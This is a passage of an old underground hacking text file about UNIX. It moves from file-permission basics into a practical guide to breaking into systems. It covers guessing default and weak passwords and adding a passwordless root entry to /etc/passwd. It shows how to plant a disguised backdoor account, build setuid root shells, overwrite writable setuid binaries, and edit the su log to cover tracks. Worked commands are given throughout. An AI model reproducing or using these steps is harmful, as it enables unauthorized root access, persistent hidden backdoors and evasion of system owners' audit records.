[1234] $ (The 1234 was the process # it got identified as). _____________________________________________________________________________ --------------- The FILE SYSTEM --------------- This is an instrumental part of UNIX. If you do not understand this section, you'll never get the hang of hacking Unix, since a lot of Pranks you can play, and things you can do to "raise your access" depend on it. First, Let's start out by talking about the directory structure. It is basically a Hiearchy file system, meaning, it starts out at a root directory and expands, just as MSDOS, and possibly AmigaDos. Here is a Directory Tree of sorts: (d) means directory / (root dir) | |--------------------| bin (d) usr (d) ----^-------------------- | | | sirhack(d) scythian (d) prophet (d) | src (d) Now, this particular system contains the following directories: / /bin /usr /usr/sirhack /usr/sirhack/src /usr/scythian /usr/prophet Hopefully, you understood that part, and you should. Everything spawns from the root directory. o File Permissions! ------------------ Now, this is really the biggie. File Permissions. It is not that hard to understand file permissions, but I will explain them deeply anyway. OK, now you must think of user groups as well as user names. Everyone belongs to a group. at the $ prompt, you could type in 'id' to see what group you are in. Ok, groups are used to allow people access certain things, instead of just having one person controlling/having access to certain files. Remember also, that Unix looks at someone's UID to determine access, not user name. Ok. File permissions are not really that complicated. Each file has an owner This OWNER is usually the one who creates the file, either by copying a file or just by plain editing one. The program CHOWN can be used to give someone ownership of a file. Remember that the owner of a file must be the one who runs CHOWN, since he is the only one that can change the permissions of a file Also, there is a group owner, which is basically the group that you were in when the file was created. You would use chgrp to change the group a file is in. Now, Files can have Execute permissions, read permissions, or write permission. If you have execute permission, you know that you can just type in the name of that program at the command line, and it will execute. If you have read permission on a file, you can obviously read the file, or do anything that reads the file in, such as copying the file or cat[ing] it (Typing it). If you do NOT have access to read a file, you can't do anything that requires reading in the file. This is the same respect with write permission. Now, all the permissions are arranged into 3 groups. The first is the owner's permissions. He may have the permissions set for himself to read and execute the file, but not write to it. This would keep him from deleting it. The second group is the group permissions. Take an elongated directory for an example: $ ls -l runme r-xrwxr-- sirhack root 10990 March 21 runme ok. Now, "root" is the groupname this file is in. "sirhack" is the owner. Now, if the group named 'root' has access to read, write and execute, they could do just that. Say .. Scythian came across the file, and was in the root user group. He could read write or execute the file. Now, say datawiz came across it, but was in the "users" group. The group permissions would not apply to him, meaning he would have no permissions, so he couldn't touch the file, right? Sorta. There is a third group of permissions, and this is the "other" group. This means that the permissions in the "other" group apply to everyone but the owner, and the users in the same group as the file. Look at the directory entry above. the r-x-rwxr-- is the permissions line. The first three characters are the permissions for the owner (r-x). The "r-x" translates to "Read and execute permissions, but no write permissions" the second set of three, r-xRWXr-- (the ones in capital letters) are the group permissions. Those three characters mean "Read, write, and execution allowed" The 3rd set, r-xrwxR-- is the permissions for everyone else. It means "Reading allowed, but nothing else". A directory would look something like this: $ ls -l drwxr-xr-x sirhack root 342 March 11 src A directory has a "d" at the beggining of the permissions line. Now, the owner of the directory (sirhack) can read from the directory, write in the directory, and execute programs from the directory. The root group and every- one else can only read from the directory, and execute off the directory. So, If I changed the directory to be executable only, this is what it would look like: $ chmod go-r $ ls drwx--x--x sirhack root 342 March 11 src Now, if someone went into the directory besides "sirhack", they could only execute programs in the directory. If they did an "ls" to get a directory of src, when they were inside src, it would say "cannot read directory". If there is a file that is readable in the directory, but the directory is not readable, it is sometimes possible to read the file anyway. If you do not have execute permissions in a directory, you won't be able to execute anything in the directory, most of the time. _____________________________________________________________________________ -------------- Hacking: -------------- The first step in hacking a UNIX is to get into the operating system by finding a valid account/password. The object of hacking is usually to get root (full privileges), so if you're lucky enough to get in as root, you need not read anymore of this hacking phile , and get into the "Having Fun" Section. Hacking can also be just to get other's accounts also. Getting IN ---------- The first thing to do is to GET IN to the Unix. I mean, get past the login prompt. That is the very first thing. When you come across a UNIX, sometimes it will identify itself by saying something like, "Young INC. Company UNIX" or Just "Young Inc. Please login" Here is where you try the defaults I listed. If you get in with those you can get into the more advanced hacking (getting root). If you do something wrong at login, you'll get the message "login incorrect" This was meant to confuse hackers, or keep the wondering. Why? Well, you don't know if you've enterred an account that does not exist, or one that does exist, and got the wrong password. If you login as root and it says "Not on Console", you have a problem. You have to login as someone else, and use SU to become root. Now, this is where you have to think. If you cannot get in with a default, you are obviously going to have to find something else to login as. Some systems provide a good way to do this by allowing the use of command logins. These are ones which simply execute a command, then logoff. However, the commands they execute are usually useful. For instance there are three common command logins that tell you who is online at the present time. They are: who rwho finger If you ever successfully get one of these to work, you can write down the usernames of those online, and try to logon as them. Lots of unsuspecting users use there login name as their password. For instance, the user "bob" may have a password named "bob" or "bob1". This, as you know, is not smart, but they don't expect a hacking spree to be carried out on them. They merely want to be able to login fast. If a command login does not exist, or is not useful at all, you will have to brainstorm. A good thing to try is to use the name of the unix that it is identified as. For instance, Young INC's Unix may have an account named "young" Young, INC. Please Login. login: young UNIX SYSTEM V REL 3.2 (c)1984 AT&T.. .. .. .. Some unixes have an account open named "test". This is also a default, but surprisingly enough, it is sometimes left open. It is good to try to use it. Remember, brainstorming is the key to a unix that has no apparent defaults open. Think of things that may go along with the Unix. type in stuff like "info", "password", "dial", "bbs" and other things that may pertain to the system. "att" is present on some machines also. ONCE INSIDE -- SPECIAL FILES ---------------------------- There are several files that are very important to the UNIX environment. They are as follows: /etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this: username:password:UserID:GroupID:description(or real name):homedir:shell Here are two sample entries: sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh demo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in: login: demo UNIX system V (c)1984 AT&T .. .. But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such: bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time its just random letters and numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password. If they match, you're in. Now, there are password hackers, but they donot decrypt the password file, but rather, encrypt words from a dictionary and try them against every account (by crypting/comparing) until it finds a match (later on!). Remember, few, if none, have decrypted the password file successfuly. /etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section. /etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs. /usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su". /usr/adm/loginlog or /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off. /usr/adm/errlog or errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH". /usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing. /usr/mail/ - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.

-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
* w
* q

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.


Account Adding

There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

Set The User ID

This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).

How do I get root?

Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh

See? That is just one way. There are others, which I will now talk

More on setting the UID

Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.